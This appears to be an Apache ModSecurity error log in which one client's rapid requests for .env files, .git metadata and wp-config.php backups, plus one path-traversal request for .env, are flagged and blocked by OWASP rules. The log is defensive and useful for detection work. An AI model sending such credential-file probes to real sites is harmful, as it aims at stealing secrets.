[Mon May 11 12:58:11.860121 2026] [security2:error] [pid 1254242:tid 1254261] [client 195.178.110.133:56004] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agG2Q74KNmD_mZ_vlf9P2QAAAFA"]
[Mon May 11 12:58:11.860179 2026] [security2:error] [pid 1254133:tid 1254146] [client 195.178.110.133:55914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agG2QxjZymfuKpjWXeiSXwAAAMo"]
[Mon May 11 12:58:11.860317 2026] [security2:error] [pid 1254242:tid 1254261] [client 195.178.110.133:56004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agG2Q74KNmD_mZ_vlf9P2QAAAFA"]
[Mon May 11 12:58:11.859628 2026] [security2:error] [pid 1254242:tid 1254263] [client 195.178.110.133:55942] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.old"] [unique_id "agG2Q74KNmD_mZ_vlf9P2AAAAFI"]
[Mon May 11 12:58:11.860626 2026] [security2:error] [pid 1254242:tid 1254263] [client 195.178.110.133:55942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.old"] [unique_id "agG2Q74KNmD_mZ_vlf9P2AAAAFI"]
[Mon May 11 12:58:11.861444 2026] [security2:error] [pid 1254133:tid 1254155] [client 195.178.110.133:55858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agG2QxjZymfuKpjWXeiSYAAAANM"]
[Mon May 11 12:58:11.861627 2026] [security2:error] [pid 1254133:tid 1254155] [client 195.178.110.133:55858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agG2QxjZymfuKpjWXeiSYAAAANM"]
[Mon May 11 12:58:11.863764 2026] [security2:error] [pid 1254242:tid 1254246] [client 195.178.110.133:55954] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.save"] [unique_id "agG2Q74KNmD_mZ_vlf9P2gAAAEA"]
[Mon May 11 12:58:11.863881 2026] [security2:error] [pid 1254179:tid 1254194] [client 195.178.110.133:55894] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agG2Q2S6k_SCYd1AVZrGCAAAAQ0"]
[Mon May 11 12:58:11.863947 2026] [security2:error] [pid 1254242:tid 1254246] [client 195.178.110.133:55954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.save"] [unique_id "agG2Q74KNmD_mZ_vlf9P2gAAAEA"]
[Mon May 11 12:58:11.864080 2026] [security2:error] [pid 1254179:tid 1254194] [client 195.178.110.133:55894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agG2Q2S6k_SCYd1AVZrGCAAAAQ0"]
[Mon May 11 12:58:11.864781 2026] [security2:error] [pid 1256241:tid 1256259] [client 195.178.110.133:55974] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agG2Q5kIEwRJMyDaV55jIgAAAU0"]
[Mon May 11 12:58:11.864906 2026] [security2:error] [pid 1256241:tid 1256259] [client 195.178.110.133:55974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agG2Q5kIEwRJMyDaV55jIgAAAU0"]
[Mon May 11 12:58:11.866424 2026] [security2:error] [pid 1254242:tid 1254249] [client 195.178.110.133:55998] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agG2Q74KNmD_mZ_vlf9P2wAAAEM"]
[Mon May 11 12:58:11.866611 2026] [security2:error] [pid 1254242:tid 1254249] [client 195.178.110.133:55998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agG2Q74KNmD_mZ_vlf9P2wAAAEM"]
[Mon May 11 12:58:11.867360 2026] [security2:error] [pid 1254328:tid 1254347] [client 195.178.110.133:55932] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agG2Q0Rdw2n9wv6Ai48dxwAAAJE"]
[Mon May 11 12:58:11.867557 2026] [security2:error] [pid 1254328:tid 1254347] [client 195.178.110.133:55932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agG2Q0Rdw2n9wv6Ai48dxwAAAJE"]
[Mon May 11 12:58:11.885226 2026] [security2:error] [pid 1256241:tid 1256264] [client 195.178.110.133:55916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/config/.env"] [unique_id "agG2Q5kIEwRJMyDaV55jIwAAAVI"]
[Mon May 11 12:58:11.885387 2026] [security2:error] [pid 1256241:tid 1256264] [client 195.178.110.133:55916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/.env"] [unique_id "agG2Q5kIEwRJMyDaV55jIwAAAVI"]
[Mon May 11 12:58:11.885755 2026] [security2:error] [pid 1254179:tid 1254186] [client 195.178.110.133:56012] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/local/.env"] [unique_id "agG2Q2S6k_SCYd1AVZrGCQAAAQU"]
[Mon May 11 12:58:11.885881 2026] [security2:error] [pid 1254179:tid 1254186] [client 195.178.110.133:56012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/local/.env"] [unique_id "agG2Q2S6k_SCYd1AVZrGCQAAAQU"]
[Mon May 11 12:58:11.945435 2026] [security2:error] [pid 1256241:tid 1256268] [client 195.178.110.133:56016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agG2Q5kIEwRJMyDaV55jJAAAAVY"]
[Mon May 11 12:58:11.945639 2026] [security2:error] [pid 1256241:tid 1256268] [client 195.178.110.133:56016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agG2Q5kIEwRJMyDaV55jJAAAAVY"]
[Mon May 11 12:58:12.984707 2026] [security2:error] [pid 1254133:tid 1254146] [client 195.178.110.133:55914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2QxjZymfuKpjWXeiSXwAAAMo"]
[Mon May 11 12:58:13.037403 2026] [security2:error] [pid 1254179:tid 1254186] [client 195.178.110.133:56012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q2S6k_SCYd1AVZrGCQAAAQU"]
[Mon May 11 12:58:13.068459 2026] [security2:error] [pid 1256241:tid 1256268] [client 195.178.110.133:56016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q5kIEwRJMyDaV55jJAAAAVY"]
[Mon May 11 12:58:13.165529 2026] [security2:error] [pid 1256241:tid 1256262] [client 195.178.110.133:56058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agG2RZkIEwRJMyDaV55jKAAAAVA"]
[Mon May 11 12:58:13.165717 2026] [security2:error] [pid 1256241:tid 1256262] [client 195.178.110.133:56058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agG2RZkIEwRJMyDaV55jKAAAAVA"]
[Mon May 11 12:58:13.172590 2026] [security2:error] [pid 1254133:tid 1254151] [client 195.178.110.133:56122] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agG2RRjZymfuKpjWXeiSZQAAAM8"]
[Mon May 11 12:58:13.172781 2026] [security2:error] [pid 1254133:tid 1254151] [client 195.178.110.133:56122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agG2RRjZymfuKpjWXeiSZQAAAM8"]
[Mon May 11 12:58:13.175141 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:56134] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2RWS6k_SCYd1AVZrGDgAAAQo"]
[Mon May 11 12:58:13.175228 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:56134] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2RWS6k_SCYd1AVZrGDgAAAQo"]
[Mon May 11 12:58:13.175344 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:56134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2RWS6k_SCYd1AVZrGDgAAAQo"]
[Mon May 11 12:58:13.276901 2026] [security2:error] [pid 1254242:tid 1254253] [client 195.178.110.133:56082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2Rb4KNmD_mZ_vlf9P3wAAAEg"]
[Mon May 11 12:58:13.277115 2026] [security2:error] [pid 1254242:tid 1254253] [client 195.178.110.133:56082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2Rb4KNmD_mZ_vlf9P3wAAAEg"]
[Mon May 11 12:58:14.142310 2026] [security2:error] [pid 1254242:tid 1254246] [client 195.178.110.133:55954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q74KNmD_mZ_vlf9P2gAAAEA"]
[Mon May 11 12:58:14.507303 2026] [access_compat:error] [pid 1254133:tid 1254148] [client 195.178.110.133:56148] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Mon May 11 12:58:14.655383 2026] [security2:error] [pid 1254242:tid 1254263] [client 195.178.110.133:55942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q74KNmD_mZ_vlf9P2AAAAFI"]
[Mon May 11 12:58:15.196485 2026] [security2:error] [pid 1254242:tid 1254261] [client 195.178.110.133:56004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q74KNmD_mZ_vlf9P2QAAAFA"]
